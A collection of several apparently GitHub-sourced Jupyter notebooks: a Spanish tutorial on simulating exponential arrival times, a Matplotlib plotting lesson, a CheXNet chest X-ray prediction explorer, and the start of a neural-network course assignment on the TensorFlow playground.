<div class="toc"><ul class="toc-item"><li><span><a href="#Introducción" data-toc-modified-id="Introducción-1"><span class="toc-item-num">1 </span>Introducción</a></span></li><li><span><a href="#Desarrollo" data-toc-modified-id="Desarrollo-2"><span class="toc-item-num">2 </span>Desarrollo</a></span><ul class="toc-item"><li><span><a href="#Función-de-sampleo-(muestreo)-de-una-variable-aleatoria-con-distribución-exponencial" data-toc-modified-id="Función-de-sampleo-(muestreo)-de-una-variable-aleatoria-con-distribución-exponencial-2.1"><span class="toc-item-num">2.1 </span>Función de sampleo (muestreo) de una variable aleatoria con distribución exponencial</a></span></li><li><span><a href="#Ejemplo-de-sampleo-de-variable-exponencial" data-toc-modified-id="Ejemplo-de-sampleo-de-variable-exponencial-2.2"><span class="toc-item-num">2.2 </span>Ejemplo de sampleo de variable exponencial</a></span></li><li><span><a href="#Ejemplo:-cálculo-de-cantidad-de-autos-que-ingresan-por-hora-en-una-autopista" data-toc-modified-id="Ejemplo:-cálculo-de-cantidad-de-autos-que-ingresan-por-hora-en-una-autopista-2.3"><span class="toc-item-num">2.3 </span>Ejemplo: cálculo de cantidad de autos que ingresan por hora en una autopista</a></span><ul class="toc-item"><li><span><a href="#Simulación-de-tiempos-de-arribo-como-variable-aleatoria-exponencial" data-toc-modified-id="Simulación-de-tiempos-de-arribo-como-variable-aleatoria-exponencial-2.3.1"><span class="toc-item-num">2.3.1 </span>Simulación de tiempos de arribo como variable aleatoria exponencial</a></span></li><li><span><a href="#Tiempos-acumulados" data-toc-modified-id="Tiempos-acumulados-2.3.2"><span class="toc-item-num">2.3.2 </span>Tiempos acumulados</a></span></li><li><span><a href="#Cantidad-de-arribos-por-hora" data-toc-modified-id="Cantidad-de-arribos-por-hora-2.3.3"><span class="toc-item-num">2.3.3 </span>Cantidad de arribos por hora</a></span></li><li><span><a href="#Estadística-sobre-tiempo-entre-arribos" data-toc-modified-id="Estadística-sobre-tiempo-entre-arribos-2.3.4"><span class="toc-item-num">2.3.4 </span>Estadística sobre tiempo entre arribos</a></span></li><li><span><a href="#Estadística-sobre-cantidad-de-arribos" data-toc-modified-id="Estadística-sobre-cantidad-de-arribos-2.3.5"><span class="toc-item-num">2.3.5 </span>Estadística sobre cantidad de arribos</a></span></li></ul></li></ul></li><li><span><a href="#Conclusión" data-toc-modified-id="Conclusión-3"><span class="toc-item-num">3 </span>Conclusión</a></span></li></ul></div>
## Introducción
El objetivo de este _Notebook_ es entender cómo se pueden simular valores de una variable aleatoria que sigue distribución exponencial. Ademas, hacer tratamiento de estos resultados obtenidos para obtener información relevante y comprender el uso de distintas librerías de Python.
Esta distribución posee la propiedad de no tener memoria. Es decir, las probabilidades no dependen de la historia que tuvo el proceso.
Por otro lado, esta distribución de probabilidad es sumamente útil para muchos casos que podemos encontrar en la realidad. Algunos ejemplos son: la gestión del mantenimiento industrial, en donde buscamos simular el tiempo entre fallas de una máquina; la teoría de filas de espera, donde el tiempo entre arribos o despachos de personas es la variable aleatoria de interés.
## Desarrollo
En primer lugar, importamos librerías de utilidad. Por un lado, _Random_ , _Numpy_ y _Math_ para el manejo matemático y de probabilidad; por el otro, _MatPlotLib_ y _Seaborn_ para graficar los resultados.
```
import random
import math
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
```
### Función de sampleo (muestreo) de una variable aleatoria con distribución exponencial
Creamos una función para samplear/muestrear un valor de una variable exponencial. Como entrada, en primer lugar, la función nos pedirá el parámetro de tasa $\lambda$ del proceso. Este parámetro, por ejemplo, podría simbolizar la cantidad de eventos por unidad de tiempo.
Además, ingresamos un valor de una variable aleatoria uniforme $u$, entre los valores 0 y 1. Esto se simboliza como:
$u \sim U(0, 1)$
Dentro de la función, calcularemos el valor de la variable aleatoria, que llamamos $t$ a través del método de la transformada inversa de la distribución exponencial, es decir:
$ t = - (1 \ / \ \lambda) \log{u}$
Por lo tanto t es una variable aleatoria distribuida exponencialmente, es decir:
$t \sim Exp(\lambda)$
En los ejercicios relacionados con investigación operativa, la variable aleatoria a simular con distribución exponencial será t y representará **el tiempo entre arribos** o **el tiempo entre despachos**. A continuación, lo programamos:
```
# Creamos la función de python llamada "samplear_exponencial".
# Los inputs son "lam" y "r"
# El output de la función será la expresión matematica para calcular "t"
# la variable input "lam" es el lambda del problema
# la variable input "r" es un número aleatorio muestreado desde una distribución uniforme
def samplear_exponencial(lam, r):
return - (1 / lam) * np.log(1-r)
```
### Ejemplo de sampleo de variable exponencial
Buscamos samplear un valor de una variable aleatoria exponencial con una media $\mu$ de 0.2. Recordemos que la media, o esperanza de la distribución exponencial es:
$\mathop{\mathbb{E}}[X] = 1 \ / \ \lambda$
Para entenderlo mejor, este valor de la esperanza podría simbolizar el tiempo medio entre eventos. Por lo tanto, $\lambda$ sería **la tasa de eventos por unidad de tiempo**.
```
# definimos el valor de la variable mu
mu = 0.2
# definimos el valor de la variable lamda
lam = 1 / mu
```
Para conseguir un valor de la variable aleatoria, simplemente tenemos que llamar a la función __samplear_exponencial__ creada anteriormente. Recordemos primero calcular los valores necesarios para alimentar la función, es decir, el valor del parámetro $\lambda$, escrito arriba, y un valor de la variable aleatoria uniforme.
```
# 1) Sampleo de variable aleatoria uniforme:
u = random.uniform(0.001, 0.999)
u = 0.41
lam = 3
# 2) Sampleo de variable aleatoria exponencial utilizando la función "samplear_exponencial" que definimos arriba
valor_exp = samplear_exponencial(lam, u)
# Imprimir valor:
print(f"Un valor de la variable aleatoria exponencial es t = {valor_exp}")
```
En el paso anterior muestreamos aleatoriamente una sola vez una distribución exponencial y obtuvimos un valor de t. Recordemos que _t_ es el tiempo entre eventos, estos eventos pueden ser arribos o despachos por ejemplo. En otras palabras simulamos una variable aleatoria solamente "en una iteración". Podriamos repetir el mismo proceso nuevamente para obtener otro numero de _t_ proveniente de la misma distribución exponencial. Repitiendo el proceso vamos a tener otro número de t ya que al inicio cuando muestreamos un valor de la distribución uniforme esta tomará un valor aleatorio que sera distinto al caso anterior.
```
# 1) vuelvo a samplear la variable aleatoria uniforme:
u = random.uniform(0.001, 0.999)
# 2) utilizo el nuevo número aleatorio uniforme U
# con ese nuevo valor de U lo utilizo como input de la función "samplear_exponencial"
# lambda sigue siendo el mismo ya que la distribución a simular sigue siendo la misma
valor_exp = samplear_exponencial(lam, u)
# Imprimir valor:
print(f"Un valor de la variable aleatoria exponencial es t = {valor_exp}")
```
### Ejemplo: cálculo de cantidad de autos que ingresan por hora en una autopista
Supongamos que buscamos calcular a través de simulación, la cantidad de autos que entran por un ingreso determinado de una autopista por hora. En primer lugar hacemos las siguientes suposiciones:
- Todos los vehículos son iguales.
- No hay horarios pico, el flujo de autos es siempre igual.
- El tiempo de arribos de vehículos sigue una distribución exponencial con una media de 0.2 horas.
Además sabemos que vamos a trabajar con una simulación de 200 autos ingresados.
#### Simulación de tiempos de arribo como variable aleatoria exponencial
Vamos a simular 200 tiempos de arribo de vehículos. Cabe aclarar, que cada uno de estos valores simulados son formalmente __"tiempo de arribo entre vehículos sucesivos"__. Es decir, representan el tiempo actual en el que ingresa un vehículo desde que ingresó el anterior. Por lo tanto, podemos pensarlos como tiempos relativos al último arribo.
Por ejemplo, si el primer tiempo arrojó 0.7 horas, y el segundo 0.2 horas. El segundo vehículo ingresó 0.2 horas luego del primero. Pensado de manera absoluta, el segundo vehículo ingresó a la suma de los dos tiempos, es decir, a las 0.9 horas.
```
n = 200
mu = 0.2
lam = 1 / mu
```
En primer lugar, creamos un vector de _Numpy_ lleno de ceros y con una longitud igual a la cantidad de sampleos a realizar.
```
tiempos = np.zeros(n)
#visualizamos en pantalla el vector tiempos
tiempos
```
Dado que buscamos samplear/muestrear 200 tiempos, vamos a iterar 200 veces la función que creamos anteriormente y guardar su resultado en el vector de nombre __tiempos__ que creamos anteriormente. Podemos pensar a las iteraciones como eventos en donde ingresa un nuevo vehículo.
```
# hacemos un ciclo "for" donde la variable "i" iterará y tomará un valor escalonado entre "0" y "n" de 1 en 1
# en cada iteración del ciclo "for" simularemos distintos valores de tiempo entre arribos
for i in range(0, n):
# Sampleo de variable aleatoria uniforme:
u = random.uniform(0.001, 0.999)
# Sampleo de variable aleatoria exponencial:
tiempos[i] = samplear_exponencial(lam, u)
```
A continuación, vamos a imprimir los primeros 20 valores que sampleamos, es decir, acceder al vector __tiempos__. Solamente imprimimos los primeros 20, para evitar visualizar tantos números al mismo tiempo.
```
tiempos[0:20]
# Nota: recordemos que en Jupyter Notebook podemos visualizar simplemente ejecutando el nombre de un objeto.
# Esto no sucede en otro contexto, sino que tendremos que escribir print(tiempos[0:20])
```
Vamos a utilizar el gráfico de barras de la librería _MatPlotLib_ para visualizar los valores obtenidos a través de cada una de las iteraciones en el vector __tiempos__. Es decir, el eje _x_ del gráfico serán las iteraciones y el _y_ el valor de la variable aleatoria correspondiente.
```
# Creamos una figura y el gráfico de barras:
plt.figure(figsize=(13,7))
plt.bar(range(0,n), tiempos)
# Seteamos título y etiquetas de los ejes:
plt.title(f'Valores simulados de una variable aleatoria Exponencial luego de {n} iteraciones')
plt.ylabel('Tiempo entre arribos')
plt.xlabel('Iteración')
# Mostramos el gráfico:
plt.show()
```
#### Tiempos acumulados
En este punto buscamos calcular los tiempos acumulados en cada iteración. Como dijimos en el título anterior, es lo que más nos interesa a la hora de poder entender las simulaciones. Dado que lo simulado es el "tiempo entre arribos", si queremos conocer la hora a la que ingresó un determinado vehículo, necesitamos conocer el acumulado.
Creamos un vector de _Numpy_ lleno de ceros, de longitud de iteraciones, que va a contener los tiempos acumulados en cada iteración. El valor de la primera posición del vector, será el primer valor generado en el vector __tiempos__.
```
# Creamos un vector de ceros:
t_acumulado = np.zeros(n)
# Cargamos el primer valor como el primer sampleo de tiempos:
t_acumulado[0] = tiempos[0]
```
Luego, comenzamos a llenar el vector con los valores acumulados.
Esto se hace iterando en un ciclo __for__. Dado un índice cualquiera $j$, sumamos el valor del vector __t_acumulado__ en el índice anterior $j-1$ al sampleo hecho en el vector __tiempos__ en el índice $j$ actual.
```
for j in range(1, n):
t_acumulado[j] = tiempos[j] + t_acumulado[j-1]
```
A continuación, vamos a imprimir los primeros 20 valores acumulados de la misma forma que hicimos anteriormente.
```
t_acumulado[0:20]
```
De la misma manera que hicimos con las simulaciones, visualizamos los tiempos acumulados por cada iteración con un gráfico de barras.
```
# Creamos una figura y el gráfico de barras:
plt.figure(figsize=(13,7))
plt.bar(range(0, n), t_acumulado)
# Seteamos título y etiquetas de los ejes:
plt.title(f'Valor acumulado del tiempo entre arribos simulado luego de {n} iteraciones')
plt.ylabel('Valor acumulado de tiempo entre arribos')
plt.xlabel('Iteración')
# Mostramos el gráfico:
plt.show()
```
#### Cantidad de arribos por hora
En este apartado vamos a utilizar el vector de tiempos acumulados __t_acumulado__ para calcular cuantos arribos hubo por hora.
Dado que en el vector de tiempos acumulados conocemos para cada vehículo ingresado su tiempo absoluto de arribo, solamente necesitamos clasificarlos según su hora de llegada.
Vamos a crear un vector, en el cual cada índice represente una hora de llegada. Por ejemplo, el índice 0, serán los vehículos ingresados desde la hora 0 a la 1.
Revisando el vector __t_acumulado__, sabemos que tenemos acumuladas más de 40 horas absolutas. Al estar ordenados de manera ascendente, podemos revisar la hora de corte en el último valor. Esta hora determina el tamaño del vector de cantidades que queremos armar. En otras palabras, tendremos tantas posiciones como horas enteras registradas y en cada una contaremos la cantidad de vehículos encontrados.
```
# Creamos un vector donde cada índice representa la hora de llegada.
ult_hora = t_acumulado[-1]
horas = int(ult_hora)
arribos_horas = np.zeros(horas + 1).astype(int)
```
Vamos a iterar para cada vehículo simulado y obtener el valor de tiempo absoluto (acumulado) en el que arribó.
Una manera rápida de poder clasificarlo, es tomar la parte entera del valor de tiempo de arribo. Es decir si el vehículo ingresó a las 3.25, sabemos que pertenece a la clasificación de la hora 3.
A continuación, usamos la hora que encontramos como índice del vector __arribos_horas__ y lo incrementamos en una unidad. Esto quiere decir que un vehículo más ingresó a esa hora.
```
for i in range(0, n):
# Extraemos el valor acumulado en el arribo i:
h = t_acumulado[i]
# Sacamos la parte entera, para saber a qué hora pertenece:
h_i = int(h)
# Buscamos el índice correspondiente a esa hora y le sumamos 1.
arribos_horas[h_i] = arribos_horas[h_i] + 1
```
Imprimimos los primeros 15 valores encontrados por un tema de facilidad de visualización.
```
arribos_horas[0:15]
```
Ahora procederemos a graficar el vector __arribos_horas__ en sus primeros 15 valores.
```
horas_vis = 15
# Creamos una figura y el gráfico de barras:
plt.figure(figsize=(13,7))
plt.bar(range(0, horas_vis), arribos_horas[0:horas_vis])
# Seteamos título y etiquetas de los ejes:
plt.title(f'Cantidad de arribos simulados hora a hora luego de {horas_vis} horas')
plt.ylabel('Cantidad de arribos')
plt.xlabel('Hora')
# Mostramos el gráfico:
plt.show()
```
#### Estadística sobre tiempo entre arribos
En esta sección queremos visualizar que las simulaciones que estamos creando coincidan con la densidad teórica que supusimos al principio.
Vamos a graficar un Histograma de los tiempos entre arribos simulados. Luego, graficamos encima la densidad de probabilidad teórica, en este caso la Exponencial con un parámetro $\lambda$ de 0.2.
```
# Creamos una figura:
plt.figure(figsize=(13,7))
# Densidad exponencial teórica:
xvals = np.linspace(0, np.max(tiempos))
yvals = stats.expon.pdf(xvals, scale=0.2)
plt.plot(xvals, yvals, c='r', label='Exponencial teórica')
plt.legend()
# Histograma normalizado de valores de tiempos:
plt.hist(tiempos, density=True, bins=20, label='Frecuencias de tiempos')
# Formato de gráfico:
plt.title('Histograma de Horas entre arribos vs. Densidad de probabilidad Exponencial')
plt.ylabel('Frecuencia de aparición de tiempo entre arribos')
plt.xlabel('Tiempo entre arribos')
# Visualizamos:
plt.show()
```
Además de observar que la función teórica exponencial se ajusta a los valores del histograma, podemos ver cómo se distribuyen alrededor de la media teórica que establecimos al principio.
#### Estadística sobre cantidad de arribos
En este caso, hacemos lo mismo que antes. Graficamos un histograma de la cantidad de arribos. Luego, construimos la función de masa de probabilidad de Poisson encima.
Debemos usar esta función ya que es la que se relaciona íntimamente con la distribución exponencial. Es sabido, teóricamente que cuando los tiempos entre arribos se distribuyen exponencialmente, las cantidades de arribos lo hacen con la de Poisson.
```
# Creamos una figura:
plt.figure(figsize=(13,7))
# Histograma normalizado de valores de tiempos:
plt.hist(arribos_horas, density=True, bins=np.max(arribos_horas), label='Frecuencias de cantidad de arribos')
# Función de masa de probabilidad poisson teórica:
xvals = range(0, np.max(arribos_horas))
yvals = stats.poisson.pmf(xvals, mu=5)
plt.plot(xvals, yvals, 'ro', ms=8, mec='r')
plt.vlines(xvals, 0, yvals, colors='r', linestyles='-', lw=2)
# Formato de gráfico:
plt.title('Histograma de cantidad de arribos vs. Func. de masa de probabilidad Poisson')
plt.ylabel('Frecuencia de cantidad de arribos')
plt.xlabel('Cantidad de arribos')
# Visualizamos:
plt.show()
```
Una vez más, en este caso, además de observar que la función de masa se ajusta a los valores del histograma, podemos ver cómo se distribuyen alrededor de la media teórica que establecimos al principio.
## Conclusión
En este Notebook pudimos observar correctamente cómo simular valores de una variable aleatoria distribuida exponencialmente. Además, comprobamos gráficamente los resultados relacionando los valores obtenidos con sus distribuciones teóricas.
Estos métodos serán útiles en el futuro para poder hacer simulaciones más complejas de filas de espera, procesos industriales conectados o mantenimiento de máquinas.
A modo de discusión, queda preguntarse,
¿Qué otras distribuciones pueden samplearse con el método de la transformada inversa?
Dado que otra distribución ampliamente utilizada en casos prácticos es la Normal ¿podríamos hacer lo mismo que hicimos en este Notebook?
|
github_jupyter
|
<p><font size="6"><b>Visualization - Matplotlib</b></font></p>
> *DS Data manipulation, analysis and visualization in Python*
> *May/June, 2021*
>
> *© 2021, Joris Van den Bossche and Stijn Van Hoey (<mailto:jorisvandenbossche@gmail.com>, <mailto:stijnvanhoey@gmail.com>). Licensed under [CC BY 4.0 Creative Commons](http://creativecommons.org/licenses/by/4.0/)*
---
# Matplotlib
[Matplotlib](http://matplotlib.org/) is a Python package used widely throughout the scientific Python community to produce high quality 2D publication graphics. It transparently supports a wide range of output formats including PNG (and other raster formats), PostScript/EPS, PDF and SVG and has interfaces for all of the major desktop GUI (graphical user interface) toolkits. It is a great package with lots of options.
However, matplotlib is...
> The 800-pound gorilla — and like most 800-pound gorillas, this one should probably be avoided unless you genuinely need its power, e.g., to make a **custom plot** or produce a **publication-ready** graphic.
> (As we’ll see, when it comes to statistical visualization, the preferred tack might be: “do as much as you easily can in your convenience layer of choice [nvdr e.g. directly from Pandas, or with seaborn], and then use matplotlib for the rest.”)
(quote used from [this](https://dansaber.wordpress.com/2016/10/02/a-dramatic-tour-through-pythons-data-visualization-landscape-including-ggplot-and-altair/) blogpost)
And that's we mostly did, just use the `.plot` function of Pandas. So, why do we learn matplotlib? Well, for the *...then use matplotlib for the rest.*; at some point, somehow!
Matplotlib comes with a convenience sub-package called ``pyplot`` which, for consistency with the wider matplotlib community, should always be imported as ``plt``:
```
import numpy as np
import matplotlib.pyplot as plt
```
## - dry stuff - The matplotlib `Figure`, `axes` and `axis`
At the heart of **every** plot is the figure object. The "Figure" object is the top level concept which can be drawn to one of the many output formats, or simply just to screen. Any object which can be drawn in this way is known as an "Artist" in matplotlib.
Lets create our first artist using pyplot, and then show it:
```
fig = plt.figure()
plt.show()
```
On its own, drawing the figure artist is uninteresting and will result in an empty piece of paper (that's why we didn't see anything above).
By far the most useful artist in matplotlib is the **Axes** artist. The Axes artist represents the "data space" of a typical plot, a rectangular axes (the most common, but not always the case, e.g. polar plots) will have 2 (confusingly named) **Axis** artists with tick labels and tick marks.

There is no limit on the number of Axes artists which can exist on a Figure artist. Let's go ahead and create a figure with a single Axes artist, and show it using pyplot:
```
ax = plt.axes()
type(ax)
type(ax.xaxis), type(ax.yaxis)
```
Matplotlib's ``pyplot`` module makes the process of creating graphics easier by allowing us to skip some of the tedious Artist construction. For example, we did not need to manually create the Figure artist with ``plt.figure`` because it was implicit that we needed a figure when we created the Axes artist.
Under the hood matplotlib still had to create a Figure artist, its just we didn't need to capture it into a variable.
## - essential stuff - `pyplot` versus Object based
Some example data:
```
x = np.linspace(0, 5, 10)
y = x ** 2
```
Observe the following difference:
**1. pyplot style: plt...** (you will see this a lot for code online!)
```
plt.plot(x, y, '-')
```
**2. creating objects**
```
fig, ax = plt.subplots()
ax.plot(x, y, '-')
```
Although a little bit more code is involved, the advantage is that we now have **full control** of where the plot axes are placed, and we can easily add more than one axis to the figure:
```
fig, ax1 = plt.subplots()
ax1.plot(x, y, '-')
ax1.set_ylabel('y')
ax2 = fig.add_axes([0.2, 0.5, 0.4, 0.3]) # inset axes
ax2.set_xlabel('x')
ax2.plot(x, y*2, 'r-')
```
<div class="alert alert-info" style="font-size:18px">
<b>REMEMBER</b>:
<ul>
<li>Use the <b>object oriented</b> power of Matplotlib!</li>
<li>Get yourself used to writing <code>fig, ax = plt.subplots()</code></li>
</ul>
</div>
```
fig, ax = plt.subplots()
ax.plot(x, y, '-')
# ...
```
## An small cheat-sheet reference for some common elements
```
x = np.linspace(-1, 0, 100)
fig, ax = plt.subplots(figsize=(10, 7))
# Adjust the created axes so that its topmost extent is 0.8 of the figure.
fig.subplots_adjust(top=0.9)
ax.plot(x, x**2, color='0.4', label='power 2')
ax.plot(x, x**3, color='0.8', linestyle='--', label='power 3')
ax.vlines(x=-0.75, ymin=0., ymax=0.8, color='0.4', linestyle='-.')
ax.axhline(y=0.1, color='0.4', linestyle='-.')
ax.fill_between(x=[-1, 1.1], y1=[0.65], y2=[0.75], color='0.85')
fig.suptitle('Figure title', fontsize=18,
fontweight='bold')
ax.set_title('Axes title', fontsize=16)
ax.set_xlabel('The X axis')
ax.set_ylabel('The Y axis $y=f(x)$', fontsize=16)
ax.set_xlim(-1.0, 1.1)
ax.set_ylim(-0.1, 1.)
ax.text(0.5, 0.2, 'Text centered at (0.5, 0.2)\nin data coordinates.',
horizontalalignment='center', fontsize=14)
ax.text(0.5, 0.5, 'Text centered at (0.5, 0.5)\nin Figure coordinates.',
horizontalalignment='center', fontsize=14,
transform=ax.transAxes, color='grey')
ax.legend(loc='upper right', frameon=True, ncol=2, fontsize=14)
```
Adjusting specific parts of a plot is a matter of accessing the correct element of the plot:

For more information on legend positioning, check [this post](http://stackoverflow.com/questions/4700614/how-to-put-the-legend-out-of-the-plot) on stackoverflow!
## I do not like the style...
**...understandable**
Matplotlib had a bad reputation in terms of its default styling as figures created with earlier versions of Matplotlib were very Matlab-lookalike and mostly not really catchy.
Since Matplotlib 2.0, this has changed: https://matplotlib.org/users/dflt_style_changes.html!
However...
> *Des goûts et des couleurs, on ne discute pas...*
(check [this link](https://fr.wiktionary.org/wiki/des_go%C3%BBts_et_des_couleurs,_on_ne_discute_pas) if you're not french-speaking)
To account different tastes, Matplotlib provides a number of styles that can be used to quickly change a number of settings:
```
plt.style.available
x = np.linspace(0, 10)
with plt.style.context('seaborn'): # 'seaborn', ggplot', 'bmh', 'grayscale', 'seaborn-whitegrid', 'seaborn-muted'
fig, ax = plt.subplots()
ax.plot(x, np.sin(x) + x + np.random.randn(50))
ax.plot(x, np.sin(x) + 0.5 * x + np.random.randn(50))
ax.plot(x, np.sin(x) + 2 * x + np.random.randn(50))
```
We should not start discussing about colors and styles, just pick **your favorite style**!
```
plt.style.use('seaborn-whitegrid')
```
or go all the way and define your own custom style, see the [official documentation](https://matplotlib.org/3.1.1/tutorials/introductory/customizing.html) or [this tutorial](https://colcarroll.github.io/yourplotlib/#/).
<div class="alert alert-info">
<b>REMEMBER</b>:
<ul>
<li>If you just want <b>quickly a good-looking plot</b>, use one of the available styles (<code>plt.style.use('...')</code>)</li>
<li>Otherwise, the object-oriented way of working makes it possible to change everything!</li>
</ul>
</div>
## Interaction with Pandas
What we have been doing while plotting with Pandas:
```
import pandas as pd
flowdata = pd.read_csv('data/vmm_flowdata.csv',
index_col='Time',
parse_dates=True)
out = flowdata.plot() # print type()
```
Under the hood, it creates an Matplotlib Figure with an Axes object.
### Pandas versus matplotlib
#### Comparison 1: single plot
```
flowdata.plot(figsize=(16, 6)) # SHIFT + TAB this!
```
Making this with matplotlib...
```
fig, ax = plt.subplots(figsize=(16, 6))
ax.plot(flowdata)
ax.legend(["L06_347", "LS06_347", "LS06_348"])
```
is still ok!
#### Comparison 2: with subplots
```
axs = flowdata.plot(subplots=True, sharex=True,
figsize=(16, 8), colormap='viridis', # Dark2
fontsize=15, rot=0)
```
Mimicking this in matplotlib (just as a reference, it is basically what Pandas is doing under the hood):
```
from matplotlib import cm
import matplotlib.dates as mdates
colors = [cm.viridis(x) for x in np.linspace(0.0, 1.0, len(flowdata.columns))] # list comprehension to set up the colors
fig, axs = plt.subplots(3, 1, figsize=(16, 8))
for ax, col, station in zip(axs, colors, flowdata.columns):
ax.plot(flowdata.index, flowdata[station], label=station, color=col)
ax.legend()
if not ax.get_subplotspec().is_last_row():
ax.xaxis.set_ticklabels([])
ax.xaxis.set_major_locator(mdates.YearLocator())
else:
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y'))
ax.set_xlabel('Time')
ax.tick_params(labelsize=15)
```
Is already a bit harder ;-)
### Best of both worlds...
```
fig, ax = plt.subplots() #prepare a Matplotlib figure
flowdata.plot(ax=ax) # use Pandas for the plotting
fig, ax = plt.subplots(figsize=(15, 5)) #prepare a matplotlib figure
flowdata.plot(ax=ax) # use pandas for the plotting
# Provide further adaptations with matplotlib:
ax.set_xlabel("")
ax.grid(which="major", linewidth='0.5', color='0.8')
fig.suptitle('Flow station time series', fontsize=15)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 6)) #provide with matplotlib 2 axis
flowdata[["L06_347", "LS06_347"]].plot(ax=ax1) # plot the two timeseries of the same location on the first plot
flowdata["LS06_348"].plot(ax=ax2, color='0.2') # plot the other station on the second plot
# further adapt with matplotlib
ax1.set_ylabel("L06_347")
ax2.set_ylabel("LS06_348")
ax2.legend()
```
<div class="alert alert-info">
<b>Remember</b>:
<ul>
<li>You can do anything with matplotlib, but at a cost... <a href="http://stackoverflow.com/questions/tagged/matplotlib">stackoverflow</a></li>
<li>The preformatting of Pandas provides mostly enough flexibility for quick analysis and draft reporting. It is not for paper-proof figures or customization</li>
</ul>
<br>
If you take the time to make your perfect/spot-on/greatest-ever matplotlib-figure: Make it a <b>reusable function</b>!
</div>
An example of such a reusable function to plot data:
```
%%file plotter.py
#this writes a file in your directory, check it(!)
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib import cm
from matplotlib.ticker import MaxNLocator
def vmm_station_plotter(flowdata, label="flow (m$^3$s$^{-1}$)"):
colors = [cm.viridis(x) for x in np.linspace(0.0, 1.0, len(flowdata.columns))] # list comprehension to set up the color sequence
fig, axs = plt.subplots(3, 1, figsize=(16, 8))
for ax, col, station in zip(axs, colors, flowdata.columns):
ax.plot(flowdata.index, flowdata[station], label=station, color=col) # this plots the data itself
ax.legend(fontsize=15)
ax.set_ylabel(label, size=15)
ax.yaxis.set_major_locator(MaxNLocator(4)) # smaller set of y-ticks for clarity
if not ax.get_subplotspec().is_last_row(): # hide the xticklabels from the none-lower row x-axis
ax.xaxis.set_ticklabels([])
ax.xaxis.set_major_locator(mdates.YearLocator())
else: # yearly xticklabels from the lower x-axis in the subplots
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y'))
ax.tick_params(axis='both', labelsize=15, pad=8) # enlarge the ticklabels and increase distance to axis (otherwise overlap)
return fig, axs
from plotter import vmm_station_plotter
# fig, axs = vmm_station_plotter(flowdata)
fig, axs = vmm_station_plotter(flowdata,
label="NO$_3$ (mg/l)")
fig.suptitle('Ammonium concentrations in the Maarkebeek', fontsize='17')
fig.savefig('ammonium_concentration.pdf')
```
<div class="alert alert-warning">
**NOTE**
- Let your hard work pay off, write your own custom functions!
</div>
<div class="alert alert-info" style="font-size:18px">
**Remember**
`fig.savefig()` to save your Figure object!
</div>
# Need more matplotlib inspiration?
For more in-depth material:
* http://www.labri.fr/perso/nrougier/teaching/matplotlib/
* notebooks in matplotlib section: http://nbviewer.jupyter.org/github/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/Index.ipynb#4.-Visualization-with-Matplotlib
* main reference: [matplotlib homepage](http://matplotlib.org/)
<div class="alert alert-info" style="font-size:18px">
**Remember**
- <a href="https://matplotlib.org/stable/gallery/index.html">matplotlib gallery</a> is an important resource to start from
- Matplotlib has some great [cheat sheets](https://github.com/matplotlib/cheatsheets) available
</div>
|
github_jupyter
|
# Reproduce CheXNet: Explore Predictions
## Import other modules and pandas
```
import visualize_prediction as V
import pandas as pd
#suppress pytorch warnings about source code changes
import warnings
warnings.filterwarnings('ignore')
```
## Settings for review
We can examine individual results in more detail, seeing probabilities of disease for test images.
We get you started with a small number of the images from the large NIH dataset.
To explore the full dataset, [download images from NIH (large, ~40gb compressed)](https://nihcc.app.box.com/v/ChestXray-NIHCC), extract all tar.gz files to a single folder, place that path below and set STARTER_IMAGES=False
```
STARTER_IMAGES=False
PATH_TO_IMAGES = "/home/frank_li_zhou/images/images/"
#STARTER_IMAGES=False
#PATH_TO_IMAGES = "your path to NIH data here"
```
Load pretrained model (part of cloned repo; should not need to change path unless you want to point to one you retrained)
```
PATH_TO_MODEL = "/home/frank_li_zhou/reproduce-chexnet/pretrained/checkpoint"
```
Pick the finding you want to see positive examples of:
LABEL can be set to any of:
- Atelectasis
- Cardiomegaly
- Consolidation
- Edema
- Effusion
- Emphysema
- Fibrosis
- Hernia
- Infiltration
- Mass
- Nodule
- Pleural_Thickening
- Pneumonia
- Pneumothorax
```
LABEL="Cardiomegaly"
```
It's more interesting when initially exploring to see cases positive for pathology of interest:
```
POSITIVE_FINDINGS_ONLY=True
```
## Load data
This loads up dataloader and model (note: only test images not used for model training are loaded).
```
dataloader,model= V.load_data(PATH_TO_IMAGES,LABEL,PATH_TO_MODEL,POSITIVE_FINDINGS_ONLY,STARTER_IMAGES)
print("Cases for review:")
print(len(dataloader))
```
## Examine individual cases
To explore, run code below to see a random case positive for your selected finding, a heatmap indicating the most influential regions of the image, and the model's estimated probabilities for findings. For many diagnoses, you can see that the model uses features outside the expected region to calibrate its predictions -- [you can read my discussion about this here](https://medium.com/@jrzech/what-are-radiological-deep-learning-models-actually-learning-f97a546c5b98).
Please note that:
1) the NIH dataset was noisily labeled by automatically extracting labels from text reports written by radiologists, as described in paper [here](https://arxiv.org/pdf/1705.02315.pdf) and analyzed [here](https://lukeoakdenrayner.wordpress.com/2017/12/18/the-chestxray14-dataset-problems/), so we should not be surprised to see inaccuracies in the provided ground truth labels
2) high AUCs can be achieved even if many positive cases are assigned absolutely low probabilities of disease, as AUC depends on the relative ranking of probabilities between cases.
You can run the below cell repeatedly to see different examples:
```
preds=V.show_next(dataloader,model, LABEL)
preds
```
|
github_jupyter
|
# Assignment 1
#### Student ID: *Double click here to fill the Student ID*
#### Name: *Double click here to fill the name*
## Q1: Exploring the TensorFlow playground
http://playground.tensorflow.org/
(a) Execute the following steps first:
1. Change the dataset to exclusive OR dataset (top-right dataset under "DATA" panel).
2. Reduce the hidden layer to only one layer and change the activation function to "ReLu".
3. Run the model five times. Before each trial, hit the "Reset the network" button to get a new random initialization. (The "Reset the network" button is the circular reset arrow just to the left of the Play button.)
4. Let each trial run for at least 500 epochs to ensure convergence.
Make some comments about the role of initialization in this non-convex optimization problem. What is the minimum number of neurons required (Keeping all other parameters unchanged) to ensure that it almost always converges to global minima (where the test loss is below 0.02)? Finally, paste the convergence results below.
* Note the convergence results should include all the settings and the model. An example is available [here](https://drive.google.com/file/d/15AXYZLNMNnpZj0kI0CgPdKnyP_KqRncz/view?usp=sharing)
<!---Your answer here.---!>
(b) Execute the following steps first
